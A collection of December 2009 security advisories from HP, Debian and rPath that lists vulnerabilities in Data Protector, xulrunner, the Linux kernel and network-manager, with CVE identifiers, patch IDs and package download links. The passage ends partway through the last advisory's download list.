Document ID: c01124817
Version: 1

HPSBMA02252 SSRT061258, SSRT061259 rev.1 - HP OpenView Storage Data Protector, Remote Arbitrary Code Execution

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2009-12-16
Last Updated: 2009-12-16

Potential Security Impact: Remote execution of arbitrary code

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with HP OpenView Storage Data Protector running on HP-UX, Windows, Linux and Solaris. These vulnerabilities could be exploited remotely to execute arbitrary code.

References: CVE-2007-2280, CVE-2007-2281

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP OpenView Data Protector Application Recovery Manager v5.50 and v6.0

BACKGROUND

CVSS 2.0 Base Metrics
===========================================================
Reference Base Vector Base Score
CVE-2007-2280 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2007-2281 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
===========================================================
Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002

The Hewlett-Packard Company thanks Tenable Network Security working with the TippingPoint Zero Day Initiative and Pedram Amini and Aaron Portnoy, both of TippingPoint DV Labs for reporting these vulnerabilities to security-alert@....

RESOLUTION

HP has provided the following patches to resolve these vulnerabilities.
The patches are available from the following location

URL http://itrc.hp.com

Operating System/Description/Patch ID

B.11.11, B.11.23, B.11.31 (PA)
OV DP6.0 (Cell Server)
PHSS_36588

B.11.11, B.11.23, B.11.31 (PA)
OV DP6.0 (Core)
PHSS_36622

B.11.23, B.11.31 (IA-64)
OV DP6.0 (Cell Server)
PHSS_36589

B.11.23, B.11.31 (IA-64)
OV DP6.0 (Core)
PHSS_36623

B.11.11, B.11.23 (PA)
OV DP5.50 (Cell Server)
PHSS_36799

B.11.11, B.11.23 (PA)
OV DP5.50 (Core)
PHSS_37382

B.11.23 (IA-64)
OV DP5.50 (Cell Server)
PHSS_36800

B.11.23 (IA-64)
OV DP5.50 (Core)
PHSS_37383

Solaris 2.8, 2.9, 2.10
OV DP6.0 (Cell Server)
DPSOL_00290

Solaris 2.8, 2.9, 2.10
OV DP6.0 (Core)
DPSOL_00294

Solaris 2.7, 2.8, 2.9
OV DP5.50 (Cell Server)
DPSOL_00300

Solaris 2.7, 2.8, 2.9
OV DP5.50 (Core)
DPSOL_00321

RedHat 4AS-x86_64, RedHat 4ES-x86_64
OV DP6.0 (Cell Server)
DPLNX_00025

RedHat 4AS-x86_64, RedHat 4ES-x86_64
OV DP6.0 (Core)
DPLNX_00029

Windows 2000/2003/XP
OV DP6.0 (Cell Server)
DPWIN_00337

Windows 2000/2003/XP
OV DP6.0 (Core)
DPWIN_00329

Windows 2000/2003/XP
OV DP5.50 (Cell Server)
DPWIN_00208

Windows 2000/2003/XP
OV DP5.50 (Core)
DPWIN_00359

MANUAL ACTIONS: No

PRODUCT SPECIFIC INFORMATION

HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa

The following text is for use by the HP-UX Software Assistant.

AFFECTED VERSIONS

For OV DP6.0, PA-RISC

HP-UX B.11.11, B.11.23, B.11.31
==================
DATA-PROTECTOR.OMNI-CS
action: install PHSS_36588 or subsequent
action: install PHSS_36622 or subsequent

For OV DP6.0, IA-64
HP-UX B.11.23, B.11.31
==================
DATA-PROTECTOR.OMNI-CS
action: install PHSS_36589 or subsequent
action: install PHSS_36623 or subsequent

For OV DP5.50, PA-RISC

HP-UX B.11.11, B.11.23
==================
DATA-PROTECTOR.OMNI-CS
action: install PHSS_36799 or subsequent
action: install PHSS_37382 or subsequent

For OV DP5.50, IA-64
HP-UX B.11.23
==================
DATA-PROTECTOR.OMNI-CS
action: install PHSS_36800 or subsequent
action: install PHSS_37383 or subsequent

END AFFECTED VERSIONS

HISTORY
Version:1 (rev.1) 16 December 2009 Initial release

Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.

Support: For further information, contact normal HP Services support channel.

Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@...
It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information.
To get the security-alert PGP key, please send an e-mail message as follows:
To: security-alert@...
Subject: get key
Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email:
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC
On the web page: ITRC security bulletins and patch sign-up
Under Step1: your ITRC security bulletins and patches
-check ALL categories for which alerts are required and continue.
Under Step2: your ITRC operating systems
-verify your operating system selections are checked and save.

To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php
Log in on the web page: Subscriber's choice for Business: sign-in.
On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections.

To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do

* The Software Product Category that this Security Bulletin
relates to is represented by the 5th and 6th characters
of the Bulletin number in the title:

GN = HP General SW
MA = HP Management Agents
MI = Misc. 3rd Party SW
MP = HP MPE/iX
NS = HP NonStop Servers
OV = HP OpenVMS
PI = HP Printing & Imaging
ST = HP Storage SW
TL = HP Trusted Linux
TU = HP Tru64 UNIX
UX = HP-UX
VV = HP VirtualVault

System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.

"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement."

Copyright 2009 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)

iEYEARECAAYFAkspcYEACgkQ4B86/C0qfVkItgCg9uk6tgF3cfRS7sNf++8iiDZ8
+zkAoLsnNDMz83rozws++rOLuTlz18Y1
=qxAw
-----END PGP SIGNATURE-----

[SECURITY] [DSA 1956-1] New xulrunner packages fix several vulnerabilities

2009-12-16T13:15:39Z

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1956-1 security@...
http://www.debian.org/security/ Moritz Muehlenhoff
December 16, 2009 http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package : xulrunner
Vulnerability : several
Problem type : remote
Debian-specific: no
CVE Id(s) : CVE-2009-3986 CVE-2009-3985 CVE-2009-3984 CVE-2009-3983 CVE-2009-3981 CVE-2009-3979

Several remote vulnerabilities have been discovered in Xulrunner, a
runtime environment for XUL applications, such as the Iceweasel web
browser. The Common Vulnerabilities and Exposures project identifies
the following problems:

CVE-2009-3986:

David James discovered that the window.opener property allows Chrome
privilege escalation.

CVE-2009-3985:

Jordi Chanel discovered a spoofing vulnerability of the URL location bar
using the document.location property.

CVE-2009-3984:

Jonathan Morgan discovered that the icon indicating a secure connection
could be spoofed through the document.location property.

CVE-2009-3983:

Takehiro Takahashi discovered that the NTLM implementaion is vulnerable
to reflection attacks.

CVE-2009-3981:

Jesse Ruderman discovered a crash in the layout engine, which might allow
the execution of arbitrary code.

CVE-2009-3979:

Jesse Ruderman, Josh Soref, Martijn Wargers, Jose Angel and Olli Pettay
discovered crashes in the layout engine, which might allow the execution
of arbitrary code.

For the stable distribution (lenny), these problems have been fixed in
version 1.9.0.16-1.

For the unstable distribution (sid), these problems have been fixed in
version 1.9.1.6-1.

We recommend that you upgrade your xulrunner packages.

Upgrade instructions
- --------------------

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 5.0 alias lenny
- --------------------------------

Stable updates are available for alpha, amd64, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

Source archives:

http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner_1.9.0.16-1.dsc
Size/MD5 checksum: 1755 661a7213945541c3aff7c1225f4a4e4b
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner_1.9.0.16.orig.tar.gz
Size/MD5 checksum: 44158276 49eccba737701abfd9f0405dc91fb848
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner_1.9.0.16-1.diff.gz
Size/MD5 checksum: 116218 6d5380e0a12ea65cbfa98059641c5b1b

Architecture independent packages:

http://security.debian.org/pool/updates/main/x/xulrunner/libmozillainterfaces-java_1.9.0.16-1_all.deb
Size/MD5 checksum: 1464570 40a5ae6f705fe11bb244e039804233ea

alpha architecture (DEC Alpha)

http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.16-1_alpha.deb
Size/MD5 checksum: 51094414 36f539011a5ee228fae0195020709cc7
http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.16-1_alpha.deb
Size/MD5 checksum: 432242 c5110bdb4836a6e20a9b9b8e6959c1e9
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.16-1_alpha.deb
Size/MD5 checksum: 9494198 0139dd56d61b77e77316ab24937df305
http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.16-1_alpha.deb
Size/MD5 checksum: 938424 b52ef8d6a5671df01a179e42379af747
http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.16-1_alpha.deb
Size/MD5 checksum: 72044 2fe658f8d17e1547d7c18d7e382b1c02
http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.16-1_alpha.deb
Size/MD5 checksum: 163948 ee725d4c448ebf6d3c3def1ec0302e8a
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.16-1_alpha.deb
Size/MD5 checksum: 3651674 4f728529795d19de42ee07c1a994d84e
http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.16-1_alpha.deb
Size/MD5 checksum: 221628 578247ecd3b3c21230b272fe446c85b8
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.16-1_alpha.deb
Size/MD5 checksum: 112068 52292e961eea13ac499f0923f8f56afe

amd64 architecture (AMD x86_64 (AMD64))

http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.16-1_amd64.deb
Size/MD5 checksum: 3288346 c4994fb96c217a3d16d718b919c5488a
http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.16-1_amd64.deb
Size/MD5 checksum: 151976 db96efb00277b2eae199c26b99ea043e
http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.16-1_amd64.deb
Size/MD5 checksum: 69948 db7a93f30248ee123430c0ec8fc51388
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.16-1_amd64.deb
Size/MD5 checksum: 101544 804243e7ed5e3fadb407f16d9d78f081
http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.16-1_amd64.deb
Size/MD5 checksum: 890384 5dfe153e3eafca3a3590d44692088152
http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.16-1_amd64.deb
Size/MD5 checksum: 374232 dfee7250cbe693362d58228d815b17a1
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.16-1_amd64.deb
Size/MD5 checksum: 50332174 0c1988f9cff6d4718d0965f6fe2ca00c
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.16-1_amd64.deb
Size/MD5 checksum: 7724684 2ece5643c14ae34a0270d1bb740d0190
http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.16-1_amd64.deb
Size/MD5 checksum: 223014 368b9f81b97bedfd51ea46cef4bfed9c

hppa architecture (HP PA RISC)

http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.16-1_hppa.deb
Size/MD5 checksum: 223372 f14b9641604130cbd1316684ce80eea4
http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.16-1_hppa.deb
Size/MD5 checksum: 72040 cee4430fd91f516a3a6b64a851cba9d1
http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.16-1_hppa.deb
Size/MD5 checksum: 898940 adc9f60d3478ac3efac390b54f758c08
http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.16-1_hppa.deb
Size/MD5 checksum: 413076 fa0451857abe00213b1c2fdbbeeb9216
http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.16-1_hppa.deb
Size/MD5 checksum: 158510 c33508922abba00e2db82b4330cfe556
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.16-1_hppa.deb
Size/MD5 checksum: 51227746 215c15bee82bd5ee69c1603c93e47c74
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.16-1_hppa.deb
Size/MD5 checksum: 3629732 24ae38db87e085986b45cbfbf51596b5
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.16-1_hppa.deb
Size/MD5 checksum: 106760 9d9f796627813bf63d3d59cbc80cae94
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.16-1_hppa.deb
Size/MD5 checksum: 9512538 053e525101326d09b2b302090b172496

i386 architecture (Intel ia32)

http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.16-1_i386.deb
Size/MD5 checksum: 6603188 5a7d3778788b71f3214ed981d2158481
http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.16-1_i386.deb
Size/MD5 checksum: 141452 0281b88b7c5efcd28e70283d9083a78c
http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.16-1_i386.deb
Size/MD5 checksum: 350878 d2977664d676cf868f1945c7949ff91b
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.16-1_i386.deb
Size/MD5 checksum: 3565586 3a069b19bc73d53ace1bd816412b4672
http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.16-1_i386.deb
Size/MD5 checksum: 851826 a7b7b5596d788b006125e1af9f50b9e2
http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.16-1_i386.deb
Size/MD5 checksum: 223270 46166eab3e8d094223f19cf7024f00f5
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.16-1_i386.deb
Size/MD5 checksum: 49496458 37d985ecce882e81a20e797ad1ea3618
http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.16-1_i386.deb
Size/MD5 checksum: 68158 8b79e51fcd2e87aba9db39b000027e5f
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.16-1_i386.deb
Size/MD5 checksum: 79204 52f55479a92095e5e410680a64c35a69

ia64 architecture (Intel ia64)

http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.16-1_ia64.deb
Size/MD5 checksum: 223178 56b4d13963a5417365ac98e7cb68f9c2
http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.16-1_ia64.deb
Size/MD5 checksum: 180234 118576ab26bd4bc6e98a32574d30aa21
http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.16-1_ia64.deb
Size/MD5 checksum: 76530 5d78eca360e0d75cb28ca38fed899d91
http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.16-1_ia64.deb
Size/MD5 checksum: 811202 72192683bea462cc1f5f672c7988d9e9
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.16-1_ia64.deb
Size/MD5 checksum: 121554 ac350b3e945c3d6b619d07f099af37ce
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.16-1_ia64.deb
Size/MD5 checksum: 3397796 8d200fb548f982d0752ade5d0c28f593
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.16-1_ia64.deb
Size/MD5 checksum: 49671280 16b4ad4e4ab3f9eab9ff83baf69e098f
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.16-1_ia64.deb
Size/MD5 checksum: 11302800 b071e5b863130a778ab494c853617ca6
http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.16-1_ia64.deb
Size/MD5 checksum: 542146 141726b2753b7921fed58c5ffba4c2df

mips architecture (MIPS (Big Endian))

http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.16-1_mips.deb
Size/MD5 checksum: 918282 528a68827030f8761ab114e74fafc1e4
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.16-1_mips.deb
Size/MD5 checksum: 3308002 bf1f6036812f8848332a98197b46e8ac
http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.16-1_mips.deb
Size/MD5 checksum: 223192 2c1f794ad7ff07396a5290c0fb39885d
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.16-1_mips.deb
Size/MD5 checksum: 97104 2bdf01e5ce9380788078e3da3dce886a
http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.16-1_mips.deb
Size/MD5 checksum: 69950 5e7d343695b4b895020e7346daf6dad8
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.16-1_mips.deb
Size/MD5 checksum: 51850028 8d341a8e7ef18c24778b61ae228dfcd7
http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.16-1_mips.deb
Size/MD5 checksum: 380128 d1394d5bbc20bb7822aede419206733d
http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.16-1_mips.deb
Size/MD5 checksum: 145388 263d12d202370293e8eb3b4c5374365d
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.16-1_mips.deb
Size/MD5 checksum: 7649668 6d6cf7e6a00da066b8e5fbdeba9d61ed

mipsel architecture (MIPS (Little Endian))

http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.16-1_mipsel.deb
Size/MD5 checksum: 145050 ebdb58e0370aef9bef4ebf5f2736f4ad
http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.16-1_mipsel.deb
Size/MD5 checksum: 223200 caf058f99c969d46b9a7a40f0d0e3fc8
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.16-1_mipsel.deb
Size/MD5 checksum: 7375656 83fea69a0f228bdd1f346cae0e4fce83
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.16-1_mipsel.deb
Size/MD5 checksum: 3309390 02be3ae69ff0bb0e74511c90e65ee397
http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.16-1_mipsel.deb
Size/MD5 checksum: 900198 c47c7a1172694e5bba824f8d8f0da98e
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.16-1_mipsel.deb
Size/MD5 checksum: 49967230 1aa11add1436ac50da0e7098b7858fcf
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.16-1_mipsel.deb
Size/MD5 checksum: 96810 d1d70a9ac6cd40722fd448822bb41d42
http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.16-1_mipsel.deb
Size/MD5 checksum: 69892 1b8c2bd977102cfa5e84e227fbb95324
http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.16-1_mipsel.deb
Size/MD5 checksum: 378640 18bf07b633c1eaa5a6766e0043491e1d

powerpc architecture (PowerPC)

http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.16-1_powerpc.deb
Size/MD5 checksum: 223186 a98c3d606008370b58426e68aa1d74eb
http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.16-1_powerpc.deb
Size/MD5 checksum: 73036 420365b25bd6586f30ad15a532b7f711
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.16-1_powerpc.deb
Size/MD5 checksum: 3283746 eb8cd1cc29aad06c45f912b39dd1d35c
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.16-1_powerpc.deb
Size/MD5 checksum: 7276356 1ff0a306c07d06af8692c569e65e4370
http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.16-1_powerpc.deb
Size/MD5 checksum: 887834 00ddf03b5858a38abb4c1268e14b8deb
http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.16-1_powerpc.deb
Size/MD5 checksum: 362562 403794ddb64118af431bae437aa83f55
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.16-1_powerpc.deb
Size/MD5 checksum: 94824 68a744cc480c2bb91e5fccd0bbe2b8f7
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.16-1_powerpc.deb
Size/MD5 checksum: 51392064 99becd6b3e9926f6b9ad06d35273bb96
http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.16-1_powerpc.deb
Size/MD5 checksum: 152322 5496044d62fc184a0207d8a1f7b16528

s390 architecture (IBM S/390)

http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.16-1_s390.deb
Size/MD5 checksum: 105586 a049e14abd47bd52222d230d0ab5a779
http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.16-1_s390.deb
Size/MD5 checksum: 406744 93ef047be735be315259b074218e86d7
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.16-1_s390.deb
Size/MD5 checksum: 8389742 4eb282c84e3c7e9f152e4039517d1937
http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.16-1_s390.deb
Size/MD5 checksum: 223184 7286a158dab58e76054ed3af5ec04a09
http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.16-1_s390.deb
Size/MD5 checksum: 909268 db230812204f07871e429bd7905ec502
http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.16-1_s390.deb
Size/MD5 checksum: 72922 3c5bedcaba5e9ea016983a0f00f54f7c
http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.16-1_s390.deb
Size/MD5 checksum: 156154 3b6f6e83b5019f2b85ede8d18e7bb108
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.16-1_s390.deb
Size/MD5 checksum: 3306442 8c65f811bc4738b29e2b380e278cacc4
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.16-1_s390.deb
Size/MD5 checksum: 51168676 4707184c455836b99d06075a06776866

sparc architecture (Sun SPARC/UltraSPARC)

http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.16-1_sparc.deb
Size/MD5 checksum: 88242 41d0bc936d44d0ae634785b40612c795
http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.16-1_sparc.deb
Size/MD5 checksum: 143282 658b3bbe4a734b9b1b17d7427d61baec
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.16-1_sparc.deb
Size/MD5 checksum: 49355150 e2f70f19c1e526dc0bd2b324d25476e8
http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.16-1_sparc.deb
Size/MD5 checksum: 350094 0dcf1d199dabaa5207adfd370f391592
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.16-1_sparc.deb
Size/MD5 checksum: 3577426 9c84a634aacd4ec64592ca24f5bec695
http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.16-1_sparc.deb
Size/MD5 checksum: 223282 4ca30dc0fc7989ee4045df25fa3df454
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.16-1_sparc.deb
Size/MD5 checksum: 7175610 7ed182660d5e25fd16ffd5e65e3af587
http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.16-1_sparc.deb
Size/MD5 checksum: 821316 6fc3418c8abe57536e00b579970efaf9
http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.16-1_sparc.deb
Size/MD5 checksum: 69406 9a525e6314a592841214dc2c77186c8c

These files will probably be moved into the stable distribution on
its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@...
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)

iEYEARECAAYFAkspTZ4ACgkQXm3vHE4uylrm8wCfVKheMHLpLTHd3MeFZGq6y80P
BvcAniuJBQ2nKpm36u5nv+fxdnsn1RbL
=aJ2S
-----END PGP SIGNATURE-----

rPSA-2009-0161-1 hwdata kernel

2009-12-16T11:20:28Z

rPath Security Advisory: 2009-0161-1
Published: 2009-12-16
Products:
rPath Appliance Platform Linux Service 1
rPath Appliance Platform Linux Service 2
rPath Linux 2

Rating: Critical
Exposure Level Classification:
Remote Root Non-deterministic Denial of Service
Updated Versions:
hwdata=conary.rpath.com@rpl:1/0.225-0.4-1
hwdata=conary.rpath.com@rpl:2/0.225-0.1-1
hwdata=rap.rpath.com@rpath:linux-1/0.225-1-1
hwdata=rap.rpath.com@rpath:linux-2/0.225-1-1
kernel=conary.rpath.com@rpl:2/2.6.29.6-0.7-1
kernel=rap.rpath.com@rpath:linux-1/2.6.29.6-8-1
kernel=rap.rpath.com@rpath:linux-2/2.6.29.6-3-1

rPath Issue Tracking System:
https://issues.rpath.com/browse/RPL-3154
https://issues.rpath.com/browse/RPL-3156

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1298

Description:
Previous kernel versions in the 2.6.29 series are vulnerable to a remote
Denial-of-Service attack (NULL pointer dereference and hang) via long IP
packets. This has been fixed.

Also, support for some new AHCI SATA controllers has been added in this
update.

http://wiki.rpath.com/Advisories:rPSA-2009-0161

Copyright 2009 rPath, Inc.
This file is distributed under the terms of the MIT License.
A copy is available at http://www.rpath.com/permanent/mit-license.html

[SECURITY] [DSA 1955-1] New network-manager/network-manager-applet packages fix information disclosure

2009-12-16T09:27:35Z

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1955-1 security@...
http://www.debian.org/security/ Steffen Joeris
December 16, 2009 http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package : network-manager/network-manager-applet
Vulnerability : information disclosure
Problem type : local
Debian-specific: no
CVE Id : CVE-2009-0365
Debian Bug : 519801

It was discovered that network-manager-applet, a network management
framework, lacks some dbus restriction rules, which allows local users
to obtain sensitive information.

If you have locally modified the /etc/dbus-1/system.d/nm-applet.conf
file, then please make sure that you merge the changes from this fix
when asked during upgrade.

For the stable distribution (lenny), this problem has been fixed in
version 0.6.6-4+lenny1 of network-manager-applet.

For the oldstable distribution (etch), this problem has been fixed in
version 0.6.4-6+etch1 of network-manager.

For the testing distribution (squeeze) and the unstable distribution
(sid), this problem has been fixed in version 0.7.0.99-1 of
network-manager-applet.

We recommend that you upgrade your network-manager and
network-manager-applet packages accordingly.

Upgrade instructions
- --------------------

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 4.0 alias etch
- -------------------------------

Debian (oldstable)
- ------------------

Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

Source archives:

http://security.debian.org/pool/updates/main/n/network-manager/network-manager_0.6.4-6+etch1.dsc
Size/MD5 checksum: 1034 9ca281c6a38a498e5735a9e8caa4b7bc
http://security.debian.org/pool/updates/main/n/network-manager/network-manager_0.6.4-6+etch1.diff.gz
Size/MD5 checksum: 20424 448d010bfa385c406fad97b0c9667731
http://security.debian.org/pool/updates/main/n/network-manager/network-manager_0.6.4.orig.tar.gz
